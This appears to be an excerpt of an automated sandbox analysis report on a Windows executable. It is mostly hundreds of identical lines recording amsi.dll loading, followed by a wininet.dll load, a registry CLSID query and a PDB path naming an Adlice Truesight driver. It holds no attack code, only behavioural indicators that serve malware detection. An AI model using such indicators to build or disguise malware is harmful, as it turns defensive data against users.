Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: nft438A5fN.exe Static file information: File size 1244672 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
